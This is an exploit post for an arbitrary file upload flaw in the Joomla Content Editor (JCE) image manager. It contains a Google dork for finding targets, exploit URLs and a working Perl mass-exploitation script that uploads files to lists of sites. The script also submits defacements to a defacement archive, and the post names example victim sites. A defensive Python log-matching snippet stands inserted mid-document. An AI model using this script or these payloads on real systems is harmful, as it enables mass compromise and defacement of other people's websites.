#################################################################################
Exploit Title : Joomla Content Editor JCE Image Manager Auto Mass Exploiter and Arbitrary File Upload Vulnerability
Author [ Discovered By ] : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
Vendor Homepage : joomlacontenteditor.net
Software Download Link : joomlacontenteditor.net/downloads / extensions.joomla.org/extension/jce/
Date : 23/05/2018
Exploit Risk : High
#################################################################################
Exploit Title : Joomla Content Editor JCE ImageManager Vulnerability Mass Auto Exploiter
Google Dork [ Example ] => inurl:''/index.php?option=com_jce''
You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ % 40 or more ] Use your brain.
Explanation for Joomla Content Editor JCE => [ ScreenShot ] https://cdn.pbrd.co/images/Hmx6KZC.jpg
JCE makes creating and editing Joomla!® content easy...
Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts¹ in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles
Media Manager => Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options
Image Manager Extended => Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension
Filemanager => Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.
Template Manager => Insert pre-defined template content from HTML or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles
#################################################################################
Severity: High [ ScreenShot for JCE Editor ] => https://cdn.pbrd.co/images/HmypA0v.png
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.
The component is prone to the following security vulnerabilities:
1. A cross-site scripting vulnerability, because it fails to sufficiently sanitize user-supplied input to the 'search' parameter of the 'administrator/index.php' script.
2. A security-bypass vulnerability occurs due to an error in the 'components/com_jce/editor/extensions/browser/file.php' script.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Affected versions: JCE 2.1.0 is vulnerable; other versions may also be affected.
References => https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27481
References => https://www.securityfocus.com/bid/53630
Note : This is not the earlier Joomla JCE exploit that uploads to this path => ..../images/stories/......php
This JCE issue is well known to some hackers, but others know nothing about this vulnerability. So this is the new one.
TARGETSİTE/yourfilename.png .gif .jpg or TARGETSİTE/images/yourfilename.html .php .asp .jpg .gif .png
#################################################################################
Notes =>
Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg
An attacker cannot reach this image manager without a username and password for the control panel. But there is a little trick to upload an image or a file through this vulnerability.
The attacker must use remote file upload code to do so.
Watch Videos from Original Sources =>
Install JCE Editor in Joomla! 2.5 Tutorial
[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]
Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial
[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]
How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability
[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]
#################################################################################
To test whether a site is vulnerable, you can open these exploit URLs in your browser. You will see error responses like the following.
Exploit => ....../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
{"result":{"error":true,"result":""},"error":null}
Exploit => ...../index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
or giving this error => {"result":null,"error":"No function call specified!"}
Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":null,"error":"No function call specified!"}
Path => TARGETSİTE/yourfilename.png gif jpg or TARGETSİTE/images/yourfilename.png gif jpg html txt
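For defenders, the request forms listed above can be matched in web server access logs. The following Python is an added example, not part of the original post; it assumes Combined Log Format, and the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - - [ts] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Parameters shared by the request forms shown above.
WANTED = {"option": "com_jce", "task": "plugin",
          "plugin": "imgmanager", "method": "form"}

def jce_imgmanager_params(path):
    """Return the parameters if path targets the JCE image manager form, else None."""
    parts = urlsplit(path)
    params = {k.lower(): v[0].lower() for k, v in parse_qs(parts.query).items()}
    for seg in parts.path.split("/"):
        # SEF form: /component/option,com_jce/action,upload/...
        key, sep, val = seg.partition(",")
        if sep:
            params.setdefault(key.lower(), val.lower())
    if all(params.get(k) == v for k, v in WANTED.items()):
        return params
    return None

def find_jce_hits(lines):
    """Return (ip, timestamp, method, status, kind) for each matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        params = jce_imgmanager_params(m["path"]) if m else None
        if params is None:
            continue
        # A POST, or action=upload, is an upload attempt; a bare GET is a probe.
        upload = m["method"] == "POST" or params.get("action") == "upload"
        hits.append((m["ip"], m["ts"], m["method"], m["status"],
                     "upload-attempt" if upload else "probe"))
    return hits

# Constructed sample lines (documentation IP ranges), not from a real server.
QS_PATH = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
SAMPLE_LOG = [
    f'203.0.113.7 - - [23/May/2018:10:01:02 +0000] "GET {QS_PATH} HTTP/1.1" 200 52 "-" "-"',
    f'203.0.113.7 - - [23/May/2018:10:01:03 +0000] "POST {QS_PATH} HTTP/1.1" 200 40 "-" "-"',
    '198.51.100.9 - - [23/May/2018:11:15:40 +0000] "GET /component/option,com_jce/'
    'action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/'
    ' HTTP/1.1" 200 53 "-" "-"',
    '192.0.2.4 - - [23/May/2018:11:16:00 +0000] "GET /index.php?option=com_content'
    '&view=article&id=3 HTTP/1.1" 200 8123 "-" "-"',
]
```

Since the image manager sits behind the administration panel, hits from clients with no authenticated administrator session are the ones to investigate first.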
Auto Mass Exploiter Perl =>
[code]#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title JCE Mass Auto Exploiter by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Sitelerin Listesi Reyis:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>Web sitesi listesi açılamıyor<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;
foreach $site(@TARGETS){
chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";
$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\Kullanıcılar\Mustafa\result\list.txt');
print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'
]
)->decoded_content;
if ($res =~ m/"error":false/i){
}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}
$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Basarili",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Olmadi<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){
$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'Gönder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Gönder $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Hata",'black on_white'),"\n";
}
}else{
print" Zone Alınmadı !! \n";
}
}[/code]
How to use this code on your operating system like Windows ;
Open Start + Go to Search Button + Type + Command Prompt [ Komut İstemi ] => or cmd.exe
Or you can use ConEmulator for Windows => https://conemu.github.io => Download it and use it.
Create a folder like " jcee " and put your jceexploit.pl and yourimagefile.png ,gif ,png ,html ,txt
C:/Users/Your-Computer-Name/ cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl
site.txt
Waiting for Upload
Exploit Successful or Not
Finished
#################################################################################
Example Sites =>
aXbcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":{"error":true,"result":""},"error":null}
sXv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
{"result":{"error":true,"result":""},"error":null}
bXuses.co.il/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload